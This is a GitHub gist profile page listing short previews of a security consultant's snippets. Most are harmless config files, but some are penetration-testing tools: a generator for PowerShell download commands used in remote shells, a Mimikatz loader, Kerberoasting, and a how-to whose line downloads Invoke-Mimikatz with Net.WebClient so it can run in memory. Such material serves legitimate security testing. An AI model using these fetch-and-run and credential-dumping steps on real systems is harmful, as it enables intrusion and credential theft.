Skip to content

Instantly share code, notes, and snippets.

View jaredhaight's full-sized avatar

Jared Haight jaredhaight

  • Trimarc Security
  • San Diego, CA
View GitHub Profile
@jaredhaight
jaredhaight / keybase.md
Created September 18, 2014 00:50
keybase.md

Keybase proof

I hereby claim:

  • I am jaredhaight on github.
  • I am jaredhaight (https://keybase.io/jaredhaight) on keybase.
  • I have a public key whose fingerprint is 517C 3E62 0B3C 12F1 01C6 DEF7 EE1C 9ED5 4781 F114

To claim this, I am signing this object:

@jaredhaight
jaredhaight / pycharm_gitignore
Created November 26, 2014 17:54
Some sane defaults for a gitgnore in a PyCharm project.
# Covers JetBrains IDEs: IntelliJ, RubyMine, PhpStorm, AppCode, PyCharm
*.iml
## Directory-based project format:
.idea/
# if you remove the above rule, at least ignore the following:
# User-specific stuff:
# .idea/workspace.xml
@jaredhaight
jaredhaight / .vimrc
Created February 20, 2015 12:26
My default vimrc
syntax on
set nocompatible
set wildmenu
set number
set tabstop=4
@jaredhaight
jaredhaight / gen_ps1_wget.py
Created March 29, 2015 19:02
Used in a remote shell to generate a PS1 file that downloads a file.
#! /usr/bin/python
import sys
if len(sys.argv) !=3:
print "Usage: gen_ps1_wget.py <http_server> <file_to_download>"
sys.exit(0)
print "\n"
print "Copy and paste the following in to the host:"
print "\n"
@jaredhaight
jaredhaight / enum4linux-scan.sh
Created March 31, 2015 14:33
enum4linux-scan.sh
if [ -z "$1" ]; then
echo "Usage: $0 <file_with_ips>"
exit 0
fi
echo "Running enum4linux\n"
echo "IP File: $1"
echo "\n"
for ip in $(cat $1);do
@jaredhaight
jaredhaight / Invoke-MimikatzSharp.cs.ps1
Created December 22, 2015 15:34
Invoke-Mimikatz.cs.ps1 Invokes x86 or x64 Mimiktaz Inside of PowerShell Process
$Source = @"
using System;
using System.IO;
using System.Text;
using System.IO.Compression;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
@jaredhaight
jaredhaight / invoke-mimikatz_usage_example.ps1
Last active January 31, 2016 18:11
At that last Charlotte Hackers (http://www.charlottehackers.com) I was asked about how to use invoke-mimkatz on an engagement. This is a brief howto.
# This is broken out bit by bit to show whats going on
# Here we point to the url for the raw ps1 file for invoke-mimikatz
$mkatz_ps1_url = "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1"
# Here we call the .NET framework to create a webclient object and download
# the raw file from the url, assigning the contents of the file to the
# $mkatz_dl var.
$mkatz_dl = (New-Object Net.WebClient).DownloadString($mkatz_ps1_url)
@jaredhaight
jaredhaight / buffer_overflow_notes.md
Last active March 26, 2016 20:07
Some notes on Buffer Overflows. This supplements a presentation that I gave for Chaha.

Terms

  • Stack: Location in RAM where the processor stores stuff (variables, functions, etc)
  • Registers: Locations on the CPU where data is stored/processed.

Immuity

  • Good walk through here
  • Tricks
    • Sometimes the registers screen goes blank, to fix this by toggling the view (hit the "C" button)
    • If you're searching for a memory address and it doesn't show up the first time, run the search again. Theres a bug in Immunity that causes this
@jaredhaight
jaredhaight / Simple_Wireless_AP
Created April 8, 2016 01:05
Script and config files for setting up a simple AP in Kali
#### INIT SCRIPT ####
#!/bin/bash
#########################################################
# #
# * Make sure to update hostapd.conf to use the monitor #
# interface (default is wlan0) #
# * Add MACs of devices you are working with to the #
# allowed_macs file #
# * Add DNS entries you're spoofing to dns_entries #
@jaredhaight
jaredhaight / Invoke-Kerberoast.ps1
Created November 1, 2016 21:54
Get Kerberoastable SPNs
<#
Invoke-Kerberoast.ps1
Author: Will Schroeder (@harmj0y), @machosec
License: BSD 3-Clause
Required Dependencies: None
Credit to Tim Medin (@TimMedin) for the Kerberoasting concept and original toolset implementation (https://github.com/nidem/kerberoast).
Note: the primary method of use will be Invoke-Kerberoast with various targeting options.